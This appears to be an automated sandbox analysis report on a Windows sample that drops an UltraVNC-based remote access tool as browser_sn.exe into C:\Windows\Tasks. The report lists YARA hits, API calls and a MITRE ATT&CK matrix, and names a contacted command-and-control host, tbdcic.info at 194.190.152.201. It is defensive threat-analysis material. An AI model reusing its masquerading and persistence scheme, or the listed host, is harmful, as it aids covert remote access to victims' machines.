                            Source: browser_sn.exe, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Shell_TrayWnd
                            Source: browser_sn.exe, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Progman
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: WTSUnRegisterSessionNotificationvncmenu.cpp : ########### Shell_TrayWnd found %i
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_00402187
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00401815 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00401815
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BE9EF0 GetProcessWindowStation,GetUserObjectInformationA,GetLastError,SetLastError,RevertToSelf,GetUserNameA,GetLastError,GetLastError,23_2_00007FF6C2BE9EF0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2C3DF80 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,23_2_00007FF6C2C3DF80
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00405721 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,_wtol,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00405721

                            Stealing of Sensitive Information

                            barindex
                            Yara detected UltraVNC Hacktool
                            Source: Yara matchFile source: 34.0.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.0.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 36.0.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.2.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 36.2.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000024.00000002.1778706674.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.1609590258.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1423232596.000000000257B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000022.00000002.3281159795.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000017.00000000.1523669185.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1422930123.0000000002923000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000022.00000000.1696757218.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000000.1776578444.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000000.1606181328.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: T8xrZb7nBL.exe PID: 7828, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: browser_sn.exe PID: 7844, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: browser_sn.exe PID: 6020, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: browser_sn.exe PID: 5252, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: browser_sn.exe PID: 6516, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Windows\Tasks\browser_sn.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\Tasks\Xv6Ya.d8LhT, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Yara detected UltraVNC Hacktool
                            Source: Yara matchFile source: 34.0.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.0.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 36.0.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.2.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 36.2.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000024.00000002.1778706674.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.1609590258.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1423232596.000000000257B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000022.00000002.3281159795.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000017.00000000.1523669185.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1422930123.0000000002923000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000022.00000000.1696757218.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000000.1776578444.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000000.1606181328.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: T8xrZb7nBL.exe PID: 7828, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: browser_sn.exe PID: 7844, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: browser_sn.exe PID: 6020, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: browser_sn.exe PID: 5252, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: browser_sn.exe PID: 6516, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Windows\Tasks\browser_sn.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\Tasks\Xv6Ya.d8LhT, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT, type: DROPPED
                            Contains VNC / remote desktop functionality (version string found)
                            Source: browser_sn.exe, 00000017.00000002.1678945320.0000000002FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.008
                            Source: browser_sn.exe, 00000022.00000002.3280567658.0000000002AEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.008
                            Source: browser_sn.exe, 00000022.00000003.2118995202.0000000002AEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.008
                            Source: browser_sn.exe, 00000022.00000003.1894011501.0000000002AEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.008
                            Source: browser_sn.exe, 00000022.00000003.2905085264.0000000002AEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.008
                            Source: browser_sn.exe, 00000022.00000003.2457395600.0000000002AEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.008

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire Infrastructure1
                            Valid Accounts                            		1
                            Windows Management Instrumentation                            		1
                            DLL Side-Loading                            		1
                            Exploitation for Privilege Escalation                            		1
                            Disable or Modify Tools                            		121
                            Input Capture                            		2
                            System Time Discovery                            		1
                            Remote Desktop Protocol                            		1
                            Archive Collected Data                            		1
                            Ingress Tool Transfer                            		Exfiltration Over Other Network Medium1
                            System Shutdown/Reboot
                            CredentialsDomainsDefault Accounts2
                            Native API                            		1
                            Valid Accounts                            		1
                            DLL Side-Loading                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory1
                            Account Discovery                            		Remote Desktop Protocol1
                            Screen Capture                            		12
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts2
                            Command and Scripting Interpreter                            		11
                            Windows Service                            		1
                            Valid Accounts                            		2
                            Obfuscated Files or Information                            		Security Account Manager1
                            System Service Discovery                            		SMB/Windows Admin Shares121
                            Input Capture                            		1
                            Remote Access Software                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal Accounts1
                            Scheduled Task/Job                            		1
                            Scheduled Task/Job                            		11
                            Access Token Manipulation                            		1
                            Timestomp                            		NTDS4
                            File and Directory Discovery                            		Distributed Component Object Model3
                            Clipboard Data                            		1
                            Non-Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud Accounts1
                            Service Execution                            		1
                            Bootkit                            		11
                            Windows Service                            		1
                            DLL Side-Loading                            		LSA Secrets26
                            System Information Discovery                            		SSHKeylogging2
                            Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts22
                            Process Injection                            		231
                            Masquerading                            		Cached Domain Credentials31
                            Security Software Discovery                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                            Scheduled Task/Job                            		1
                            Valid Accounts                            		DCSync1
                            Virtualization/Sandbox Evasion                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                            Virtualization/Sandbox Evasion                            		Proc Filesystem3
                            Process Discovery                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                            Access Token Manipulation                            		/etc/passwd and /etc/shadow11
                            Application Window Discovery                            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron22
                            Process Injection                            		Network Sniffing1
                            System Owner/User Discovery                            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                            Bootkit                            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579878 Sample: T8xrZb7nBL.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 84 64 x1.i.lencr.org 2->64 66 tbdcic.info 2->66 68 bg.microsoft.map.fastly.net 2->68 72 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->72 74 Yara detected UltraVNC Hacktool 2->74 76 AI detected suspicious sample 2->76 78 3 other signatures 2->78 10 T8xrZb7nBL.exe 9 2->10         started        signatures3 process4 file5 52 C:\Users\user\AppData\Local\...\Xv6Ya.d8LhT, PE32+ 10->52 dropped 54 C:\Users\user\AppData\Local\...\uqVb3.kkb9h, PE32+ 10->54 dropped 86 Contains functionality to register a low level keyboard hook 10->86 14 cmd.exe 3 6 10->14         started        17 cmd.exe 7 10->17         started        19 cmd.exe 2 10->19         started        21 cmd.exe 2 10->21         started        signatures6 process7 file8 56 C:\Windows\Tasks\conhost.exe, PE32+ 14->56 dropped 58 C:\Windows\Tasks\browser_sn.exe, PE32+ 14->58 dropped 23 cmd.exe 14->23         started        26 browser_sn.exe 14->26         started        29 Acrobat.exe 20 61 14->29         started        37 12 other processes 14->37 60 C:\Windows\Tasks\Xv6Ya.d8LhT, PE32+ 17->60 dropped 62 C:\Windows\Tasks\uqVb3.kkb9h, PE32+ 17->62 dropped 31 conhost.exe 17->31         started        33 conhost.exe 19->33         started        35 conhost.exe 21->35         started        process9 dnsIp10 80 Drops executables to the windows directory (C:\Windows) and starts them 23->80 39 browser_sn.exe 23->39         started        42 timeout.exe 23->42         started        44 taskkill.exe 23->44         started        48 4 other processes 23->48 70 tbdcic.info 194.190.152.201, 443, 49723, 49724 RSHB-ASRU Russian Federation 26->70 82 Contains VNC / remote desktop functionality (version string found) 26->82 46 AcroCEF.exe 108 29->46         started        signatures11 process12 signatures13 84 Contains VNC / remote desktop functionality (version string found) 39->84 50 AcroCEF.exe 46->50         started        process14

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            T8xrZb7nBL.exe3%ReversingLabs

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT0%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\7ZipSfx.000\uqVb3.kkb9h0%ReversingLabs
                            C:\Windows\Tasks\Xv6Ya.d8LhT0%ReversingLabs
                            C:\Windows\Tasks\browser_sn.exe0%ReversingLabs
                            C:\Windows\Tasks\conhost.exe0%ReversingLabs
                            C:\Windows\Tasks\uqVb3.kkb9h0%ReversingLabs

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            No Antivirus matches

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            tbdcic.info
                            		194.190.152.201
                            		truefalse
                              		high
                              bg.microsoft.map.fastly.net
                              		199.232.210.172
                              		truefalse
                                		high
                                x1.i.lencr.org
                                		unknown
                                		unknownfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www.uvnc.comT8xrZb7nBL.exe, 00000000.00000003.1423232596.000000000257B000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002923000.00000004.00000020.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000000.1523669185.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609590258.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000002.3281159795.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000002.1778706674.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drfalse
                                    		high
                                    http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.14.drfalse
                                      		high
                                      http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drfalse
                                        		high
                                        http://www.uvnc.comopenhttp://forum.uvnc.comnetT8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drfalse
                                          		unknown
                                          http://crl.thawte.com/ThawteTimestampingCA.crl0T8xrZb7nBL.exe, 00000000.00000003.1423232596.0000000002589000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002931000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drfalse
                                            		high
                                            http://java.sun.com/products/plugin/index.html#downloadT8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drfalse
                                              		high
                                              http://forum.uvnc.comT8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drfalse
                                                		unknown
                                                http://ocsp.thawte.com0T8xrZb7nBL.exe, 00000000.00000003.1423232596.0000000002589000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002931000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drfalse
                                                  		high

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  194.190.152.201
                                                  		tbdcic.infoRussian Federation
                                                  		41615RSHB-ASRUfalse

